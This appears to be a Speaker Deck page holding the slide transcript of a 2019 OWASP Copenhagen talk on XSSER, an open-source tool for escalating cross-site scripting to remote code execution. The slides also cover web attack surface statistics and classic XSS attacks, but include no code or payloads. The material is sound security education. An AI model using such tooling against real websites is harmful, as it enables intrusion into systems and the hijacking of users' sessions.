Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSER: From XSS to RCE 3.0
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Hans-Michael Varbaek
March 28, 2019
Technology
180
0
Share
XSSER: From XSS to RCE 3.0
OWASP Copenhagen
Hans-Michael Varbaek
March 28, 2019
More Decks by Hans-Michael Varbaek
See All by Hans-Michael Varbaek
Attack & Defense Methods
varbaek
0
48
Attack and Defense Methods for Traffic Light Systems
varbaek
0
34
So you want to be a pentester?
varbaek
2
1.5k
From XSS to RCE 2.5 - Alt33c3
varbaek
0
200
XSSing Your Way to Shell
varbaek
2
2.1k
Botnets of the Web – How to Hijack One
varbaek
1
250
Other Decks in Technology
See All in Technology
Agentic ERPをどう設計するか ー 受発注エージェントを動かす、現場の知見と設計思想ー
recerqainc
1
600
新規事業を牽引する技術選定 〜フルスタックTypeScript開発の実践事例〜
nullnull
1
170
GoとSIMDとWasmの今。
askua
3
470
「コーディング」しない人のための Claude Code 入門 ChatGPT の次の一歩 — 業務に組み込む 育成・共有・自動化
rfdnxbro
2
1.1k
Generative UI × A2UI で AI エージェントを作った話 AI-DLC も使ってみた!
kmiya84377
1
310
AI時代の私の技術インプットとアウトプット術
tonkotsuboy_com
16
8.2k
製造業のクラウド活用最適解〜AI,DXを加速するデータ基盤の作り方〜
hamadakoji
0
300
オンコールの負荷軽減のためのBits Assistant 活用方法 / How to Use Bits Assistant to Reduce the Workload on On-Call Staff
sms_tech
1
370
APIテストとは?
nagix
0
170
Cloud Run のアップデート 触ってみる&紹介
gre212
0
300
サプライチェーンセキュリティの空白地帯 - 信頼できる”依存性”の未来を考える
rung
PRO
2
640
Javaコミュニティをもっと楽しむための9箇条
takasyou
0
1.1k
Featured
See All Featured
Scaling GitHub
holman
464
140k
SEO for Brand Visibility & Recognition
aleyda
0
4.6k
ラッコキーワード サービス紹介資料
rakko
1
3.5M
The B2B funnel & how to create a winning content strategy
katarinadahlin
PRO
1
380
Thoughts on Productivity
jonyablonski
76
5.2k
My Coaching Mixtape
mlcsv
0
140
SEO in 2025: How to Prepare for the Future of Search
ipullrank
3
3.5k
Leveraging LLMs for student feedback in introductory data science courses - posit::conf(2025)
minecr
1
270
Bash Introduction
62gerente
615
210k
VelocityConf: Rendering Performance Case Studies
addyosmani
333
25k
The Cult of Friendly URLs
andyhume
79
6.9k
Bioeconomy Workshop: Dr. Julius Ecuru, Opportunities for a Bioeconomy in West Africa
akademiya2063
PRO
1
130
Transcript
XSSER: From XSS to RCE 3.0 OWASP Copenhagen Chapter 28
March 2019
About me ➢ ISP Red Team – Copenhagen ➢ Presented
at Black Hat Europe, Kiwicon, Hack in the Box, etc. ➢ Full-time security consultant career began in Sydney, Australia
Shodan: port:80
How many web servers globally? ➢ 85 million approximately (Shodan
– Port:80) How many of them run PHP? ➢ 8.1 million approximately (Shodan – PHP) However..
What about virtual hosting? ➢ 1.4 billion websites ➢ 232
million unique domains ➢ 27 million websites running WordPress That’s a lot more attack surface for adversaries (Netcraft March 2019 Survey)
Classic XSS Attacks ➢ Cookie Stealing ➢ Prevented by “HttpOnly”
flag ➢ Defacements ➢ Phishing ➢ Session Hijacking (e.g. BeEF, XSSER, etc.)
None
None
None
None
XSSER
XSSER What and why? ➢ Can automate XSS attacks to
obtain RCE ➢ Meant for educational purposes ➢ Fully open source and available on GitHub
Demo
References https://github.com/Varbaek/xsser https://shodan.io https://news.netcraft.com/archives/cat egory/web-server-survey/
Questions?
SiteGround - Reliable hosting with speed, security, and support you can count on.
varbaek
recerqainc
nullnull
askua
rfdnxbro
kmiya84377
tonkotsuboy_com
hamadakoji
sms_tech
nagix
gre212
rung
takasyou
holman
aleyda
rakko
katarinadahlin
jonyablonski
mlcsv
ipullrank
minecr
62gerente
addyosmani
andyhume
akademiya2063
